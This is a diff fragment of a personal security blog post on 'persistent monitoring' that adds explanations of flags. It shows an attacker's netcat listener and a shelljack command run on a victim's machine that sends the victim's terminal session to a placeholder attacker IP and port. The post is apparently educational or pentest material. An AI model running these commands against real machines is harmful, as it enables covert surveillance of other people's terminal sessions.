M4luk0/m4luk0.github.io/_posts/2022-01-25-Persistent-monitoring.md

 nc -lvp Port
 ```

+With this command we are setting up a listener with -l, putting the command in verbose with -v and with -p we are setting up the port.

-Now in the victim's machine we have to know the PID of the tty and execute shelljack:
+Now in the victim's machine we have to know the PID (proccess ID) of the tty because shelljack needs it and then execute shelljack:

 ```bash
 tty
 ./shelljack -n Attacker IP:Port $$
 ```

+With this command we are executing shelljack to connect us to that IP and that port.

 ![](https://raw.githubusercontent.com/M4luk0/m4luk0.github.io/master/images/victim_poc.png)